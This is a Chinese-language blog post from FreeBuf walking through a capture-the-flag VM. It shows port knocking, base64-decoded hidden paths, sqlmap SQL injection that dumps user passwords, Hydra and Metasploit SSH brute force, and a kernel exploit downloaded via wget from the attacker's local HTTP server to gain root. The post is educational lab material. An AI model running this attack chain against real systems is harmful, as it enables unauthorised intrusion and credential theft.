官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
简介
作者:摇光
时间:2024-04-19
座右铭:路虽远,行则将至,事虽难,做则必成。
请注意:
对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址
nmap -sP 192.168.111.0/24
目标主机的ip:192.168.111.138
nmap -sS -sV -A -p- -T5 192.168.111.138
扫描全端口,查看开放端口及服务详情
只开放了22端口及ssh服务
二、ssh尝试登录
ssh 192.168.111.138
Easy as 1,2,3
意思是让敲震端口3次
---------
端口碰撞
端口试探(port knocking)是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机。
端口试探的主要目的是防治攻击者通过端口扫描的方式对主机进行攻击。端口试探类似于一次秘密握手协议,比如一种最基本的方式:发送一定序列的UDP、TCP数据包。当运行在主机上的daemon程序捕捉到数据包以后,如果这个序列正确,则开启相应的端口,或者防火墙允许客户端通过。
由于对外的Linux服务器通过限制IP地址的方式来控制访问,因此可以利用这种端口试探方式来进行防火墙对于访问IP地址的控制。
如何进行端口碰撞?
首先需要我们知道端口碰撞的序列,否则暴力碰撞开启的机会太小。
1)第一种方法:knock 命令
linux安装:sudo apt install knockd
使用:
knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v
例如需要碰撞 172.16.1.1 的 3,4,7,8 端口:
knock 10.211.55.11 1 2 3 -v2)hping3:TCP/IP数据包组装/分析工具
hping3 -S [IP地址] -p 1 -c 1
hping3 -S 10.211.55.11 -p 1 -c 1
hping3 -S 10.211.55.11 -p 2 -c 1
hping3 -S 10.211.55.11 -p 3 -c 1
----------------
-S(--syn):SYN是TCP/IP建立连接时使用的握手信号。在客户机和服务器之间建立正常的TCP网络连接时,客户机首先发出一个SYN消息,服务器使用SYN-ACK应答表示接收到了这个消息,最后客户机再以ACK消息响应。这样在客户机和服务器之间才能建立起可靠的TCP连接,数据才可以在客户机和服务器之间传递。
-p --destport: 目的端口(默认为0),可同时指定多个端口
-c --count:指定数据包的次数
参考资料:https://blog.csdn.net/qq_30247635/article/details/86243448
---------
hping3端口碰撞
hping3 -S 192.168.111.138 -p 1 -c 1
hping3 -S 192.168.111.138 -p 2 -c 1
hping3 -S 192.168.111.138 -p 3 -c 1
通过ping冲撞之后,防火墙规则,重新进行nmap扫描,查看碰撞打开的端口
nmap -sS -sV -A -p- -T5 192.168.111.138
发现打开了1337端口
1337端口存在http服务,进行信息枚举
经过枚举,发现该路径:/usr/share/dirb/wordlists/common.txt
三、web渗透
浏览器访问
http://192.168.111.138:1337/usr/share/dirb/wordlists/common.txt
F12查看调试界面
发现:THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
kali--base64解码
echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d
解码后的内容为:Lzk3ODM0NTIxMC9pbmRleC5waHA= ,发现还是base64,继续解码
发现文件路径:/978345210/index.php
浏览器访问
http://192.168.111.138:1337//978345210/index.php
发现Welcome to the Gates of Mordor,进行sql注入,这里使用sqlmap注入
sqlmap爆破数据库
爆破数据库库名
sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs
-------------
Optimization
-o:开启所有优化开关
--predict-output:预测常见的查询输出
--keep-alive:使用持久的HTTP(S)连接
--null-connection:从没有实际的HTTP响应体中检索页面长度
--threads=THREADS:设置请求的并发数
--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试
-------------
爆出四个数据库库名信息!继续获取webapp数据表信息!
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
爆破数据库表信息
sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs -D Webapp --tables
可以看到Users数据表,继续查看数据表信息!
爆破数据库表字段信息
sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs -D Webapp --tables -T Users --columns
(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、--columns:列出指定表上的所有列)
可看到数据库Webapp的表Users中存在字段id,password,username信息!
爆破字段内容信息
sqlmap -o -u "http://192.168.111.138:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump
获得普通用户的用户名密码,那么来爆破下!
user:
frodo
smeagol
aragorn
legolas
gimli
passwd:
iwilltakethering
MyPreciousR00t
AndMySword
AndMyBow
AndMyAxe
用户名和密码分别写入两个txt文件
SSH爆破-Hydra、MSF
1.hydra(九头蛇)爆破登录用户和密码
hydra -L user.txt -P pass.txt 192.168.111.138 ssh
获得登录用户和密码
login: smeagol password: MyPreciousR00t
2.MSF爆破登录用户和密码
启动MSF
msfconsole
查找ssh的登录漏洞
search ssh_login
利用第0个漏洞进行爆破
use auxiliary/scanner/ssh/ssh_login
查看需要哪些配置
show options
输入配置信息
set rhost 192.168.111.138
set user_file /root/Desktop/lordof/user.txt
set pass_file /root/Desktop/lordof/pass.txt
set stop_on_success true
运行
run
获得登录用户名和密码
smeagol:MyPreciousR00t
四、内核提权
SSH登录提权
MyPreciousR00t
查看系统当前权限,内核版本
id
lsb_release -a
发现只是普通用户权限,系统版本为Ubuntu 14.04.3 LTS
方法一:EXP内核提权
谷歌搜索:Ubuntu 14.04 exploit
https://www.exploit-db.com/exploits/39166
EDB-ID:39166
kali查询39166
searchsploit 39166
查看路径
locate linux/local/39166.c
拷贝到本地
cp /usr/share/exploitdb/exploits/linux/local/39166.c .
打开8081端口,准备上传EXP文件
python -m SimpleHTTPServer 8081
上传EXP文件
wget http://192.168.111.128:8081/39166.c
编译重命名为yg
gcc 39166.c -o yg
给编译后的文件赋予最高权限,运行
chmod +x yg
./yg
提权成功!当前权限为root
切换到root目录,查看flag文件
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
方法二:Mysql UDF提权
后续~
已在FreeBuf发表 0 篇文章
- 0 文章数
- 0 关注者